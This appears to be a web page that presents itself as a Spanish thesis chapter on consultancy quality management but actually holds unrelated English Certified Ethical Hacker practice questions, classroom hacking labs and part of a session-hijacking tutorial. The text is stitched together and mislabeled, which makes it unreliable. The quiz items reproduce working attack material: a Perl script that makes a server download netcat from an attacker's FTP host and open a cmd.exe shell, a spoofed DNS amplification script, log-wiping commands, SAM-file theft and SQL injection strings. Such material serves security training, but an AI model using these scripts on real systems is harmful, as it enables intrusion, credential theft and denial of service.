Diseño de proceso - Establecimiento de metodología a emplear

Capítulo III. Diseño del modelo de gestión de calidad de la consultoría

3.1 Establecimiento de metodología a emplear

3.1.2 Diseño de proceso

#rm rootkit.c

#ps –aux { grep inetd ; ps –aux|grep portmap ; rm /sbin/portmap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm –rf .bash* ; rm –rf

/root/.bash_history ; rm –rf /usr/sbin/namedps –aux | grep inetd ; ps –aux | grep portmap ; rm /sbin/port359 ? 00:00:00 inetd

#ps –aux | grep portmap

#ps –aux | grep inetd ; ps –aux | grep portmap ; rm /sbin/portmap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm –rf .bash* ; rm –rf

/root/.bash_history ; rm –rf /usr/sbin/namedps –aux | grep inetd ; ps –aux | grep portmap ; rm /sbin/port359 00:00:00 inetd

What is the attacker trying to do?

A. Cover his/her tracks B. Port scan

C. Escalate privileges

D. Man-in-the-middle attack

Attack #2

GET

/msadc/…../…../…../winnt/system32/cmd.exe?/c+dir+c:\HTTP/1.1..Accept:

image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,

excel, application/msword, application/vnd.ms-powerpoint, */*..Accept-Language: en-us..Accept-Encoding: gzip, deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)..Host: lib.bvxttrip.org..Connection: Keep-Alive..Cookie:

ASPSESSIONIDGQQQQQZU=KNOHEMW

What type of attack is being performed?

A. SQL injection B. Firewalking

C. Directory Traversal D. Cross-site scripting

Attack #3

A screen pops up on your screen with the following message:

Message from SYSTEM to ALERT on 7/19/2005 6:00:03 PM

STOP! WINDOWS REQUIRES IMMEDIATE ATTENTION.

Windows has found Critical Errors.

To fix the errors please do the following:

1. Download Registry Repair from http://www.repairreg.com 2. Install Registry Repair

3. Run Registry Repair 4. Reboot your computer

FAILURE TO ACT NOW MAY LEAD TO DATA LOSS AND CORRUPTION What could cause this message?

A. Windows messenger SPAM B. MyDoom virus

C. Beast Trojan

D. Denial of Service attack

Attack #4

You receive 91 ICMP_ECHO packets within 90 minutes from 47 different sites. 77 of the ICMP_ECHO packets have ICMP ID: 39612 and Seq:57072. 13 of the ICMP_ECHO packets have ICMP ID:0 and Seq:0.

What does this mean?

A. Attacker is using NAT.

B. Attacker modified TCP/IP stack on the attacking system.

C. 77 packets are from a single subnet while 13 of the packets are from a different subnet.

D. ICMP ID and Sequence numbers are set by a tool and not the operating system.

Attack #5

Log entry:

1/19-13:22:01:44:812319 192.168.145.98:21 -> 200.100.50.25:4214 TCP TTL:63 TOS:0x10 ID:11842 DF

What service is being exploited?

A. SMTP B. FTP C. WWW D. SQL

Attack #6

Mkdir –p /etc/X11/appInk/Internet/.etc

Mkdir –p /etc/X11/appInk/Internet/.etcpasswd

Touch –acmr /etc/passwd /etc/X11/AppInk/Internet/.etcpasswd Passwd nobody –d

Passwd dns –d

Touch –acmr /etc/X11/appInk/Internet/.etcpasswd /etc/passwd Touch –acmr /etc/X11/appInk/Internet/.etc /etc

Is the attacker trying to change the password of an account?

How many accounts are being manipulated?

Attack #7

12/09-01:22:31.167035 207.219.240:1882 -> 172.16.1.104:21 TCP TTL:50 TOS:0x0 ID:53476 DF

*****PA* Seq: 0x33BC72AD Ack: 0x110CE81E Win: 0x7D78 TCP Options => NOP NOP TS: 126045057 105803098

50 41 53 53 20 90 90 90 90 90 90 90 90 90 90 PASS ……….

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

12/09-01:22:31.169534 172.16.1.104:21 -> 207.219.207.240:1882 TCP TTL: 63 TOS: 0x10 ID: 48231 DF

*****PA* Seq: 0x110CE81E Ack: 0x33BC7446 Win: 0x7D78 TCP Options => NOP NOP TS: 105803113 126045057

35 33 30 20 4C 6F 67 69 6E 20 69 6E 63 6F 72 72 530 Login Incorr

65 63 74 2E 0D 0A etc…

Was the attacker successful?

Attack #8

############################################

$port = 53; # Spawn cmd.exe on port X

$your = “192.168.1.1”; # Your FTP server

$user = “Anonymous”; #login as

$pass = „[email protected]‟; #password

############################################

$host = $ARGV[0];

print “Starting…\n”;

print “Server will download the file nc.exe from $your FTP server.\n”;

system(“perl msadc.pl –h $host –C \”echo open $your >sasfile\””);

system(“perl msadc.pl –h $host –C \”echo $user>>sasfile\””);

system(“perl msadc.pl –h $host –C \”echo $pass>>sasfile\””);

system(“perl msadc.pl –h $host –C \”echo bin>>sasfile\””);

system(“perl msadc.pl –h $host –C \”echo get nc.exe>>sasfile\””);

system(“perl msadc.pl –h $host –C \”echo get hacked.html>>sasfile\””);

system(“perl msadc.pl –h $host –C \”echo quit>>sasfile\””);

print “Server is downloading…\n”;

system(“perl msadc.pl –h $host –C \”ftp \-s\:sasfile\””);

print “Press ENTER when download is finished .. (That‟s why it‟s good to have your own ftp server)\n”;

$o=<STDIN>; print “Opening…\n”;

system(“perl msadc.pl –h $host –C \”nc –l –p $port –e cmd.exe\””);

print “Done.\n”;

#system(“telnet $host $port”); exit(0);

What does this code do?

A. Creates a share called sasfile B. Creates a backdoor account

C. Opens a telnet listener that requires no username or password D. Creates a FTP server

Attack #9

use Net::DNS::Resolver;

use Net::RawIP;

open(LIST,”ns.list”);

@list=<LIST>;

close LIST;

chomp(@list);

my $lnum=@list;

my $i=0;

my $loop=0;

if ($ARGV[0] eq „‟) {

print “Usage: ./hackme.pl <target IP> <loop count>\n”;

exit(0);

}

while($loop < $ARGV[1]) { while($i < $lnum) {

my $source = $ARGV[0];

my $dnspkt = new Net::DNS::Packet(“google.com”, “ANY”);

my $pktdata = $dnspkt->data;

my $sock = new Net::RawIP({udp=>{}});

$sock->set({ip=> { saddr => $source, daddr => $list[$i], frag_off=>0,tos=0,id=>1565, udp => {source => 53, dest => 53, data=>$pktdata} });

$sock->send;

$i++;

}$loop++; $i=0;}

exit(0);

What type of attack is this?

A. DNS lookup attacks

B. DNS reflection and amplification attack C. FTP DOS

D. FTP backdoor

Attack #10

C:\> cmd /c type c:\winnt\repair\sam > c:\file.txt Volume in drive C has no label.

Volume Serial Number is 3105-51BF Directory of C:\

3/14/04 04:12a 0 AUTOEXEC.BAT 3/14/04 8:01a 322 boot.ini 3/14/05 12:44p <DIR> WINNT 3/14/05 12:10p <DIR> TEMP 1,221,095,103 bytes free

C:\>type file.txt

C:\>copy file.txt c:\inetpub\wwwroot C:\>GET file.txt HTTP/1.1

Server: Microsoft-IIS/4.0

Date: Sun, 04 Feb 2001 15:44:12 GMT ETag: “9814ed8abc83103:8ff”

Content-Length: 5131

What is the hacker trying to steal?

A. file.txt B. index.html c. sam.txt d. cmd.exe

Attack #11

Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169

Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 ->

172.16.1.107:482

Apr 24 18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 ->

172.16.1.107:53

Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval:

194.222.156.169:1425 -> 172.16.1.107:21

Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53

Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 ->

172.16.1.107:53

Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 ->

172.16.1.101:53

Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 ->

172.16.1.107:111

Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard:

198.173.35.164:4221 -> 172.16.1.107:80

Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 ->

172.16.1.101:53

Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 ->

172.16.1.107:53

Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by (uid=0)

Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by simple(uid=506)

Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 ->

172.16.1.107:1080

Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558

What type of attack is this?

A. Unsuccessful port scan

B. The hacker has a backdoor into the compromised system C. A DNS poisoning attack

D. An unsuccessful WEP attack

Attack #12

Below is the e-mail header of a spoofed header found on the Internet. What is the IP address of the true source?

Return-Path: <[email protected]>

Received: from smtp.com (fw.emumail.com [215.52.220.122].

by raq-221-181.ev1.net (8.10.2/8.10.2. with ESMTP id h78NIn404807

for <[email protected]>; Sat, 9 Aug 2003 18:18:50 -0500 Received: (qmail 12685 invoked from network.; 8 Aug 2003

23:25:25 -0000

Received: from ([19.25.19.10].

by smtp.com with SMTP

Received: from unknown (HELO CHRISLAPTOP. (168.150.84.123.

by localhost with SMTP; 8 Aug 2003 23:25:01 -0000 From: "Bill Gates" <[email protected]>

To: "mikeg" <[email protected]>

Subject: We need your help!

Date: Fri, 8 Aug 2003 19:12:28 -0400 Message-ID: <51.32.123.21@CHRISLAPTOP>

X-Mailer: Microsoft Outlook, Build 10.0.2627

X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 Importance: Normal

Attack #13

The following code is vulnerable to what type of attack?

Set objConn = CreateObject("ADODB.Connection") objConn.OpenApplication("WebUsersConnection")

sSQL="SELECT * FROM Users where Username=? & Request("user") & _

"?and Password=? & Request("pwd") & "?

Set RS = objConn.Execute(sSQL)

Set objConn = nothing Response.Redirect("mainpage.asp") End If

Attack #14

Below is a partial hexdump of a packet. What version of Microsoft IIS is this web server?

000 00 00 BA 5E BA 11 00 A0 C9 B0 5E BD 08 00 45 00 ...^...^...E.

010 05 DC 1D E4 40 00 7F 06 C2 6D 0A 00 00 02 0A 00 [email protected]...

020 01 C9 00 50 07 75 05 D0 00 C0 04 AE 7D F5 50 10 ...P.u...}.P.

030 70 79 8F 27 00 00 48 54 54 50 2F 31 2E 31 20 32 py.'..HTTP/1.1.2 040 30 30 20 4F 4B 0D 0A 56 69 61 3A 20 31 2E 30 20 00.OK..Via:.1.0.

050 53 54 52 49 44 45 52 0D 0A 50 72 6F 78 79 2D 43 STRIDER..Proxy-C 060 6F 6E 6E 65 63 74 69 6F 6E 3A 20 4B 65 65 70 2D onnection:.Keep- 070 41 6C 69 76 65 0D 0A 43 6F 6E 74 65 6E 74 2D 4C Alive..Content-L 080 65 6E 67 74 68 3A 20 32 39 36 37 34 0D 0A 43 6F ength:.29674..Co 090 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 ntent-Type:.text 0A0 2F 68 74 6D 6C 0D 0A 53 65 72 76 65 72 3A 20 4D /html..Server:.

0B0 69 63 72 6F 73 6F 66 74 2D 49 49 53 2F 34 2E 30 ..Microsoft 0C0 0D 0A 44 61 74 65 3A 20 53 75 6E 2C 20 32 35 20 ..Date:.Sun,.25.

0D0 4A 75 6C 20 31 39 39 39 20 32 31 3A 34 35 3A 35 Jul.1999.21:45:5 0E0 31 20 47 4D 54 0D 0A 41 63 63 65 70 74 2D 52 61 1.GMT..Accept-Ra

Attack #15

Below is a sample output of a web log. What type of attack is being performed her?

Attempted login of unknown user: johnm Attempted login of unknown user: susaR Attempted login of unknown user: sencat Attempted login of unknown user: pete'';

Attempted login of unknown user: ' or 1=1--

Attempted login of unknown user: '; drop table logins-- Login of user jason, sessionID= 0x75627578626F6F6B

Login of user daniel, sessionID= 0x98627579539E13BE Login of user rebecca, sessionID= 0x9062757944CCB811 Login of user mike, sessionID= 0x9062757935FB5C64

Labs

Introduction

A Certified Ethical Hacker must possess expert-level skills to successfully attack and defend systems. There is often more than one way to exploit a system, so creativity and ‘out-of-the-box’ thinking are encouraged. These labs are designed not to teach you a specific tool for an exploit, but to give you an opportunity to test out your knowledge and skills that you are acquiring in a lab environment.

Exam Relevance

None of these labs are required for you to master in order to pass the C|EH exam.

Software Used in Labs

EC-Council does their best to update the content in their included CDs. In some cases, the tools mentioned in these labs may not be included in the CDs or may be outdated, so if you can’t find the tool on your computers, you may want to download the software off of the Internet. Your instructor can help you find the software.

Footprinting

Footprint the http://www.certifiedhacker.com web site.

Suggested tools:

 www.dnsstuff.com

 Sam Spade

 Smart Whois

 www.archive.org

 www.kloth.net

 IP2Country

 NewTracePro

 Visual Route

 www.centralops.net

 Which ISP Owns IP

 WhereIsIP

What does it mean to footprint a web site?

What is the contact information for this web site?

Where is the web site located?

What is the IP address of this web site?

When was the web site first put up?

How is Footprinting a web site helpful to an ethical or malicious hacker?

Scanning

1) Nmap.

Launch a packet sniffer (Ettercap, Ethereal/Wireshark, etc.) and run various Nmap scans against other hosts in the classroom. Watch for RSTs, SYN/Acks, etc. coming from the host you are scanning.

2) Hping

 Read through the Hping2 man page (available online or in Linux)

 Perform a port scan on a computer in the classroom

 Experiment with different options in Hping2 to try different types of scans Bonus: Read the Hping3 man page. Use Hping3 to scan a computer in the web site.

Do you prefer Hping3 or Hping2? Why?

How could a malicious or ethical hacker use Hping2 or Hping3?

Enumeration

Ask another student or your instructor to set up additional accounts and some shares on their computer.

Enumerate the computer.

What is the SID of the Administrator account?

What users exist on the computer?

What is the password of the Administrator? (Hint: NAT or Venom can help you with this)

How do you test for NULL sessions?

How do NULL sessions help you with hacking?

How do you protect against NULL sessions? (Hint: It can be done in the registry or in the local security policies).

System Hacking

Password Cracking

Create three additional users on your computer. Assign one user a short dictionary password of less than eight characters. Give a blank password to another. Assign a difficult password to the third.

Get the hash of the Administrator account.

Suggested tools:

 L0phtcrack

 Pwdump3v2

 Ntinfoscan

What is the password to the Administrator account?

When was the Administrator account last changed?

Are you able to get the passwords of the other accounts?

Steganography

Hide the message “you’ve been hacked” on your computer.

Suggested tools:

 NTFS Alternate Data Streams

 Snow

 NT Rootkit

 Blindside

Trojans and Backdoors

Launching A Trojan

Take control of another computer using a Trojan or Backdoor. Note: we haven’t covered the different ways of getting a Trojan on another computer yet, so for this lab you may want to work with another student to launch the Trojan on another computer.

Suggested tools:

 NetBus

 SubSeven

 BackOrifice2000

 Donald Dick

 Beast

Use Netcat to gain shell access to your victim host.

What is the Netcat syntax on the victim host?

Read the Netcat man page. What other things can you do with Netcat?

Can you think of any ways you might get the Trojan on the victim host?

Detecting Trojan Activity

Detect the ports and processes running on your computer.

Suggested tools:

 Fport

 TCP View

 What’s on my computer?

 Hacker Eliminator

 Process Viewer

 Windows task manager

 Netstat

Did you find any Trojans running on your computer? If so, what ports are they listening on?

Trojan Wrappers

Using Yet Another Binder (YAB), bind a Trojan with a Windows program (such as Solitaire or Calculator).

Sniffers

1) Sniff web traffic on the network.

Suggested tools:

 Ettercap (Linux)

 Windump/tcpdump

 Wireshark/Ethereal 2) MSN chat

Work with a partner to set up MSN Messenger on your computers. Launch a sniffer and chat with each other. Can you see each other’s conversation?

Download the MSN IM encryption software Simplite (www.secway.fr) and re-launch MSN IM.

Can you see each other’s conversation?

3) E-mail

Set up a free e-mail account on mail.com. Configure Outlook Express for your new POP account. Run the sniffer in the background while you send test messages. Can you see your password and/or your e-mail messages?

4) ARP poisoning / MAC flooding

Test out ARP poisoning and/or MAC flooding to capture all traffic.

Suggested tools:

 Ettercap (Linux)

 Macof (Linux)

 Cain & Abel

Can you see traffic from other hosts?

Denial Of Service

As a class, agree on a denial of service tool and launch it against a single computer in the classroom.

Suggested tools:

 DDOSPing

 Blast20

 Nemesy13

 Datapool

If possible, launch multiple processes of these tools.

On the victim host, launch task manager and/or performance monitor to see if you are making an impact.

Session Hijacking

The following is from http://www.csn.ul.ie/~syfer/tutorials/sessionhijacking.htm. It requires the use of a hub in the classroom. Depending on your location, you may or may not have a hub.

Session Hijacking

Session hijacking. What a powerful name. For me personally, the name conjures up mental pictures of airplanes with masked gunmen and bomb-laden buses. In actuality, session hijacking is far less physically dangerous but way more financially rewarding.

In a previous article, I discussed ARP poisoning and password detection tools. This takes that article to the next level and discusses how to hijack sessions. Sniffing networks (or ARP poisoning to sniff switched networks) is a great way to collect passwords.

Unfortunately, tools like Dsniff and ettercap aren't always capable of detecting every password that crosses the network. This is where session hijacking can become your friend (or your worst enemy depending on which side of the infosec coin you're on.) In this article I will detail Netflood's test results and the techniques we used to hijack active sessions.

Abstract:

In order to session hijack traffic, multiple attacks or techniques may have to take place. For example, one may have to DoS attack a server in order to keep it from sending RST (reset) packets to the victim. If I were to detail a DoS technique (with every available argument) it would distract thoughts away from the real topic of this article. Some knowledge will have to be gleaned from RFC's, man pages, code comments, by researching on your own, or by merely using your intelligence to conceive of vulnerabilities not discussed herein; Hence, the word "primer". No one wrote me a little "session hijacking for dummies" book and I figured it out, so you can too.

Disclaimer:

This paper describes nothing more than some vulnerabilities of the Transmission Control Protocol and tools/thoughts which exploit those vulnerabilities. It is intended for educational use only. You are responsible for what you do with this information. I am no more responsible for people committing crimes with this information then chemistry instructors are responsible for people who construct bombs or chemical warfare devices. [Insert expensive lawyer jargon here to stave off unfounded FBI allegations ala Sil]. All your base are belong to us.

Contents:

A look at TCP

Local Network Session Hijacking Remote Network Session Hijacking Defending against session hijack attacks

A Look At TCP

Transmission Control Protocol (TCP) is addressed in RFC 793. For the sake of brevity, I will only cover relevant portions of the RFC; adding information to it when necessary. The Transmission Control Protocol (TCP) is intended for use as a highly reliable host-to host protocol between hosts in packet-switched computer communication networks, and in interconnected systems of such networks.

TCP must recover from data that is damaged, lost, duplicated, or delivered out of order by the internet communication system. This is achieved by assigning a sequence number to each octet transmitted, and requiring a positive acknowledgment (ACK) from the receiving TCP. If the ACK is not received within a timeout interval, the data is retransmitted. At the receiver, the sequence numbers are used to correctly order segments that may be received out of order and to eliminate duplicates. Damage is handled by adding a checksum to each segment transmitted, checking it at the receiver, and discarding damaged segments.

A fundamental notion in the design is that every octet of data sent over a TCP connection has a sequence number. Since every octet is sequenced, each of them can be acknowledged. The

acknowledgment mechanism employed is cumulative so that an acknowledgment of sequence number X indicates that all octets up to but not including X have been received. This mechanism allows for straight-forward duplicate detection in the presence of retransmission. Numbering of octets within a

segment is: the first data octet immediately following the header is the lowest numbered, and the following octets are numbered consecutively.

It is essential to remember that the actual sequence number space is finite, though very large. This space ranges from 0 to 4294967295 (2**32)-1. Since the space is finite, all arithmetic dealing with sequence numbers must be performed modulo 2**32 (4294967296). This unsigned arithmetic preserves the relationship of sequence numbers as they cycle from 2**32 - 1 to 0 again. There are some subtleties to computer modulo arithmetic, so great care should be taken in programming the comparison of such values. So you see that the ISN can be any number between 0 and 4294967295. You also hopefully noticed that every octet has a sequence number, not every session. The server (TCPB) will respond to the client (TCPA) with it's own sequence number, while acknowledging the clients sequence number.

See below for an example:

Sequence prediction to take over networks was first written about in 1985 (or thereabouts) by none other than Robert T. Morris (his son created the first Internet worm). The first attack employing this technique did not occur until Christmas of '94, this is known as the Mitnick hack of Shimomura (or

"Christmas hack"). Over the years, OS's have become more random in deriving the ISN, but we all know that computers are not random thinkers. Eventually over time, even computers choosing random numbers will repeat themselves, because the randomness is based on an internal algorithm. There is a great in-depth article, which can be found here, that explores sequence number generation and prediction in more detail.

Once a sequence number has been agreed to, all following data will be the ISN+1. This makes injecting data into the communication stream possible, if one were so inclined. The tricky part is not hijacking the session, but in finding out the ISN. Once the ISN (or the ISN increment) is discovered, everything else is gravy.

3 requirements to hijack non-encrypted TCP communications:

1. There must be non-encrypted session oriented traffic.

2. Attacker must be able to recognize TCP sequence numbers and predict what the next sequence number will be.

3. Attacker must spoof a hosts MAC or IP address to receive communications which are not destined for the attackers host

If the attacker is on your local segment, they can sniff the connections and therefore see what the ISN+1 number is, they can also have the traffic routed back to them by poisoning the ARP cache. This is why implementing internal network protocol encryption is so important (albeit rarely done).

Local Network Session Hijacking

Rather then reinvent the wheel, we used a tool that's readily available, called Hunt (downloadable @ netflood.net). We will use the newest version (1.5) because it runs on WindowsME (that's just a joke to

In document Generar una empresa de consultoría para incrementar la productividad y calidad en MIPYMES del DF a través del coaching. (página 55-61)